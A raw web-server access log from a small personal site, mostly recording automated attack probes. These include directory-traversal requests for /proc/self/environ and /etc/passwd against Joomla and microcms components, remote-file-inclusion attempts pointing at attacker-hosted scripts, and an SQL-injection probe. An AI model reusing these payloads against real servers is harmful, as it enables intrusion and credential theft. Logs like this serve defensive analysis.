88.191.94.188 - - [19/May/2010:11:05:29 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:11:05:29 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.177.13.130 - - [19/May/2010:11:06:26 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:06:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:06:27 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
121.88.4.141 - - [19/May/2010:11:07:40 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:11:07:40 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:11:07:40 -0500] "GET /logs/access_log.1270598400//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:11:07:54 -0500] "GET /logs/access_log.1270512000//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
85.235.154.15 - - [19/May/2010:11:08:46 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.235.154.15 - - [19/May/2010:11:08:46 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.125.182.40 - - [19/May/2010:11:10:34 -0500] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:11:10:34 -0500] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 348 "-""libwww-perl/5.813"
207.46.199.55 - - [19/May/2010:11:11:36 -0500] "GET /logs/access_log.1217289600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [19/May/2010:11:16:40 -0500] "GET /logs/access_log.1273795200 HTTP/1.1" 200 533939 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.55.51.115 - - [19/May/2010:11:17:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.159.31.10 - - [19/May/2010:11:17:46 -0500] "GET /logs/access_log.1273276800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:11:17:46 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:11:17:46 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.195.112.180 - - [19/May/2010:11:18:03 -0500] "GET /logs/access_log.1230422400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.51.115 - - [19/May/2010:11:18:11 -0500] "GET /logs/access_log.1233360000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.145 - - [19/May/2010:11:18:36 -0500] "GET /logs/access_log.1181260800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.185 - - [19/May/2010:11:19:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.129.245 - - [19/May/2010:11:20:21 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
66.249.129.245 - - [19/May/2010:11:20:22 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
66.249.129.245 - - [19/May/2010:11:20:22 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
66.249.129.245 - - [19/May/2010:11:22:29 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
75.126.213.59 - - [19/May/2010:11:25:08 -0500] "GET /logs/access_log.1273276800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
75.126.213.59 - - [19/May/2010:11:25:08 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
75.126.213.59 - - [19/May/2010:11:25:09 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6146 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:11:25:28 -0500] "GET /logs/access_log.1273276800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:11:25:28 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:11:25:28 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6146 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:11:25:28 -0500] "GET /logs/access_log.1273276800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:11:25:29 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:11:25:29 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6146 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:11:26:22 -0500] "GET /logs/access_log.1273276800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:11:26:22 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:11:26:22 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6146 "-""libwww-perl/5.834"
174.136.55.175 - - [19/May/2010:11:29:42 -0500] "GET /logs/access_log.1273363200//localhost/exploit/microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 375 "-""libwww-perl/5.823"
174.136.55.175 - - [19/May/2010:11:29:42 -0500] "GET //localhost/exploit/microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 348 "-""libwww-perl/5.823"
174.136.55.175 - - [19/May/2010:11:29:42 -0500] "GET /logs//localhost/exploit/microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-""libwww-perl/5.823"
67.195.112.180 - - [19/May/2010:11:31:34 -0500] "GET /logs/access_log.1164153600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.174.72.86 - - [19/May/2010:11:32:28 -0500] "GET /logs/access_log.1273363200//localhost/exploit/microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 375 "-""libwww-perl/5.810"
79.174.72.86 - - [19/May/2010:11:32:29 -0500] "GET //localhost/exploit/microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 348 "-""libwww-perl/5.810"
79.174.72.86 - - [19/May/2010:11:32:29 -0500] "GET /logs//localhost/exploit/microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-""libwww-perl/5.810"
211.115.111.115 - - [19/May/2010:11:33:50 -0500] "GET /logs/access_log.1273363200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://liceum3.ru/help/sh/id.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.115.111.115 - - [19/May/2010:11:33:50 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://liceum3.ru/help/sh/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.115.111.115 - - [19/May/2010:11:33:50 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://liceum3.ru/help/sh/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
178.32.3.34 - - [19/May/2010:11:33:54 -0500] "GET /logs/access_log.1273276800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:11:33:54 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:11:33:54 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6146 "-""libwww-perl/5.834"
174.136.55.175 - - [19/May/2010:11:34:36 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
70.38.71.147 - - [19/May/2010:11:34:59 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:11:35:09 -0500] "GET /logs/access_log.1273276800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:11:35:09 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:11:35:09 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6146 "-""libwww-perl/5.803"
74.54.63.138 - - [19/May/2010:11:35:10 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:11:35:21 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
207.46.13.49 - - [19/May/2010:11:35:35 -0500] "GET /logs/access_log.1235606400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.38.71.147 - - [19/May/2010:11:36:15 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
79.174.72.86 - - [19/May/2010:11:36:23 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
75.126.213.59 - - [19/May/2010:11:36:27 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
212.188.192.20 - - [19/May/2010:11:36:40 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
80.65.166.74 - - [19/May/2010:11:38:05 -0500] "GET /logs/access_log.1273276800///*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""libwww-perl/5.831"
80.65.166.74 - - [19/May/2010:11:38:05 -0500] "GET ///*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.831"
80.65.166.74 - - [19/May/2010:11:38:05 -0500] "GET /logs///*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
80.65.166.74 - - [19/May/2010:11:38:08 -0500] "GET /logs/access_log.1273276800///*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""libwww-perl/5.831"
80.65.166.74 - - [19/May/2010:11:38:08 -0500] "GET ///*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.831"
80.65.166.74 - - [19/May/2010:11:38:09 -0500] "GET /logs///*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
122.85.48.63 - - [19/May/2010:11:39:50 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
212.188.192.20 - - [19/May/2010:11:40:21 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.188.192.20 - - [19/May/2010:11:40:21 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.188.192.20 - - [19/May/2010:11:40:22 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.23.9.198 - - [19/May/2010:11:40:56 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
178.32.3.34 - - [19/May/2010:11:41:00 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
212.188.192.20 - - [19/May/2010:11:42:56 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
75.146.174.225 - - [19/May/2010:11:42:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.146.174.225 - - [19/May/2010:11:42:59 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.146.174.225 - - [19/May/2010:11:43:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.146.174.225 - - [19/May/2010:11:43:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
85.235.154.15 - - [19/May/2010:11:44:26 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.235.154.15 - - [19/May/2010:11:44:27 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.235.154.15 - - [19/May/2010:11:44:27 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.235.154.15 - - [19/May/2010:11:44:30 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.235.154.15 - - [19/May/2010:11:44:30 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.235.154.15 - - [19/May/2010:11:44:30 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
75.146.174.225 - - [19/May/2010:11:45:01 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.146.174.225 - - [19/May/2010:11:45:01 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.146.174.225 - - [19/May/2010:11:45:01 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.146.174.225 - - [19/May/2010:11:45:01 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
85.235.154.15 - - [19/May/2010:11:46:10 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.235.154.15 - - [19/May/2010:11:46:15 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:11:46:32 -0500] "GET /logs/access_log.1249344000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.90.47.83 - - [19/May/2010:11:47:28 -0500] "GET /logs/access_log.1223683200/////?sourcedir=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
69.90.47.83 - - [19/May/2010:11:47:28 -0500] "GET /////?sourcedir=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 200 1006 "-""libwww-perl/5.805"
69.90.47.83 - - [19/May/2010:11:47:28 -0500] "GET /logs/////?sourcedir=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 200 6154 "-""libwww-perl/5.805"
70.38.71.147 - - [19/May/2010:11:47:53 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:11:47:53 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:11:47:53 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
79.174.72.86 - - [19/May/2010:11:48:49 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
79.174.72.86 - - [19/May/2010:11:48:50 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
79.174.72.86 - - [19/May/2010:11:48:50 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:11:50:15 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
212.188.192.20 - - [19/May/2010:11:50:27 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.188.192.20 - - [19/May/2010:11:50:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.188.192.20 - - [19/May/2010:11:50:28 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
79.174.72.86 - - [19/May/2010:11:51:00 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.120.159.141 - - [19/May/2010:11:51:13 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&Itemid=55&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
174.120.159.141 - - [19/May/2010:11:51:13 -0500] "GET /index2.php?option=com_myblog&Itemid=55&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.120.159.141 - - [19/May/2010:11:51:13 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=55&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
87.252.3.123 - - [19/May/2010:11:52:17 -0500] "GET /logs/index.php?menu=deti&page=http://ecuadorsito.com//plugins/system/cdscriptegrator/libraries/highslide/js/1.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.252.3.123 - - [19/May/2010:11:52:17 -0500] "GET /index.php?menu=deti&page=http://ecuadorsito.com//plugins/system/cdscriptegrator/libraries/highslide/js/1.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
87.252.3.123 - - [19/May/2010:11:52:17 -0500] "GET /logs/access_log.1271376000/index.php?menu=deti&page=http://ecuadorsito.com//plugins/system/cdscriptegrator/libraries/highslide/js/1.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.195.112.180 - - [19/May/2010:11:54:04 -0500] "GET /?N=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.120.159.141 - - [19/May/2010:11:56:13 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&Itemid=55&task=' HTTP/1.1" 404 321 "-""libwww-perl/5.831"
174.120.159.141 - - [19/May/2010:11:56:13 -0500] "GET /index2.php?option=com_myblog&Itemid=55&task=' HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.120.159.141 - - [19/May/2010:11:56:13 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=55&task=' HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.46.204.230 - - [19/May/2010:11:56:35 -0500] "GET /logs/access_log.1165449600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.188.192.20 - - [19/May/2010:11:56:52 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
188.122.78.2 - - [19/May/2010:11:58:25 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.122.78.2 - - [19/May/2010:11:58:25 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.122.78.2 - - [19/May/2010:11:58:25 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.122.78.2 - - [19/May/2010:11:58:29 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.122.78.2 - - [19/May/2010:11:58:29 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.122.78.2 - - [19/May/2010:11:58:30 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.125.182.40 - - [19/May/2010:11:59:00 -0500] "GET //logout.php?PSA_PATH=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:11:59:01 -0500] "GET /logs//logout.php?PSA_PATH=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.813"
